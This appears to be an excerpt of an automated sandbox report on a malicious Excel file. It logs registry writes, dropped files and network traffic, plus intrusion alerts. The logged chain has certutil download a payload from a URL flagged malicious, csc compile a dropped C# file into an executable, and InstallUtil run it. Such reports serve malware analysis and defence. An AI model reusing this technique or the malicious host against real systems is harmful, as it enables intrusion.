3552
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
E00D0000980FD8DE7677D40100000000
3552
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3552
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3552
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\183758
183758
04000000E00D00003900000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C00520051005F00420065006E00650066006900740073005F005500700064006100740065002E0078006C0073007800000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C00010000000000000030B3FFDF7677D401583718005837180000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3552
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\183758
183758
04000000E00D00003900000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C00520051005F00420065006E00650066006900740073005F005500700064006100740065002E0078006C0073007800000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C00010000000000000030B3FFDF7677D401583718005837180000000000AC020000001800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3552
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{AE43BD40-A232-484C-B42D-4D7D9E3D35DC}
3552
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
EXCELFiles
1298661399
3552
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661508
3552
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\183804
183804
04000000E00D00003900000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C00520051005F00420065006E00650066006900740073005F005500700064006100740065002E0078006C0073007800000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0001000000010000006073BBDE7677D401043818000438180000000000AC020000640000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3552
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
25
3552
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Max Display
25
3552
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
538F6C892AD540068154C6670774E980
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
3552
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
ProductNonBootFilesIntl_1033
1298661386
3552
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
ProductNonBootFilesIntl_1033
1298661387
3240
certutil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASAPI32
EnableFileTracing
0
3240
certutil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASAPI32
EnableConsoleTracing
0
3240
certutil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASAPI32
FileTracingMask
4294901760
3240
certutil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASAPI32
ConsoleTracingMask
4294901760
3240
certutil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASAPI32
MaxFileSize
1048576
3240
certutil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASAPI32
FileDirectory
%windir%\tracing
3240
certutil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASMANCS
EnableFileTracing
0
3240
certutil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASMANCS
EnableConsoleTracing
0
3240
certutil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASMANCS
FileTracingMask
4294901760
3240
certutil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASMANCS
ConsoleTracingMask
4294901760
3240
certutil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASMANCS
MaxFileSize
1048576
3240
certutil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASMANCS
FileDirectory
%windir%\tracing
3240
certutil.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3240
certutil.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
3240
certutil.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3240
certutil.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2312
InstallUtil.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2312
InstallUtil.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2312
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32
EnableFileTracing
0
2312
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32
EnableConsoleTracing
0
2312
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32
FileTracingMask
4294901760
2312
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32
ConsoleTracingMask
4294901760
2312
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32
MaxFileSize
1048576
2312
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32
FileDirectory
%windir%\tracing
2312
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS
EnableFileTracing
0
2312
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS
EnableConsoleTracing
0
2312
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS
FileTracingMask
4294901760
2312
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS
ConsoleTracingMask
4294901760
2312
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS
MaxFileSize
1048576
2312
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS
FileDirectory
%windir%\tracing
2312
InstallUtil.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2312
InstallUtil.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000006A000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2312
InstallUtil.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US

Files activity

Executable files
1
Suspicious files
6
Text files
48
Unknown types
2

Dropped files

PID Process Filename Type
3096 csc.exe C:\Users\admin\Documents\secureportal.exe executable
3552 EXCEL.EXE C:\Users\admin\AppData\Local\Temp\CVR3294.tmp.cvr ––
2312 InstallUtil.exe C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 compressed
2312 InstallUtil.exe C:\Users\admin\AppData\Local\Temp\Cab9BB2.tmp ––
2312 InstallUtil.exe C:\Users\admin\AppData\Local\Temp\Tar9AF6.tmp ––
2312 InstallUtil.exe C:\Users\admin\AppData\Local\Temp\Cab9AE5.tmp ––
2312 InstallUtil.exe C:\Users\admin\AppData\Local\Temp\Tar9A96.tmp ––
2312 InstallUtil.exe C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416 binary
2312 InstallUtil.exe C:\Users\admin\AppData\Local\Temp\Cab9A95.tmp ––
2312 InstallUtil.exe C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416 der
2312 InstallUtil.exe C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 binary
3556 cvtres.exe C:\Users\admin\AppData\Local\Temp\RES8D85.tmp ––
3096 csc.exe C:\Users\admin\Documents\CSC6E5CC93A1F0B4235A2BAC703AE57FF.TMP res
2012 cmd.exe C:\Users\admin\Documents\secureportal.cs text
3240 certutil.exe C:\Users\admin\Documents\update.txt text
3240 certutil.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\update[1].txt text
3240 certutil.exe C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\986B16B585414FC211A10CF9ED2E8609 text
3240 certutil.exe C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\986B16B585414FC211A10CF9ED2E8609 binary
2312 InstallUtil.exe C:\Users\admin\AppData\Local\Temp\Tar9BB3.tmp ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
4
TCP/UDP connections
6
DNS requests
5
Threats
6

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
3240 certutil.exe GET 200 18.222.69.127:80 http://healthbenefitsenrollment.com/updates/update.txt US
text
malicious
3240 certutil.exe GET 200 18.222.69.127:80 http://healthbenefitsenrollment.com/updates/update.txt US
text
malicious
2312 InstallUtil.exe GET 200 13.32.67.181:80 http://x.ss2.us/x.cer US
der
whitelisted
2312 InstallUtil.exe GET 200 205.185.216.10:80 http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab US
compressed
whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
3240 certutil.exe 18.222.69.127:80 Amazon.com, Inc. US malicious
2312 InstallUtil.exe 104.198.170.193:443 Google Inc. US unknown
2312 InstallUtil.exe 13.32.123.240:443 Amazon.com, Inc. US unknown
2312 InstallUtil.exe 13.32.67.181:80 Amazon.com, Inc. US unknown
2312 InstallUtil.exe 205.185.216.10:80 Highwinds Network Group, Inc. US whitelisted

DNS requests

Domain IP Reputation
healthbenefitsenrollment.com 18.222.69.127
malicious
savantinformationservices.com 104.198.170.193
unknown
microsoft-office-2011.soft32.com 13.32.123.240
13.32.123.6
13.32.123.209
13.32.123.69
unknown
x.ss2.us 13.32.67.181
13.32.67.214
13.32.67.211
13.32.67.194
whitelisted
www.download.windowsupdate.com 205.185.216.10
205.185.216.10
205.185.216.10
205.185.216.42
whitelisted

Threats

PID Process Class Message
3240 certutil.exe A Network Trojan was detected MALWARE [PTsecurity] PowerShell script Payload (NewObject)
3240 certutil.exe Potential Corporate Privacy Violation POLICY [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
3240 certutil.exe A Network Trojan was detected MALWARE [PTsecurity] PowerShell script Payload (NewObject)

3 ETPRO signatures available at the full report

Debug output strings

No debug info.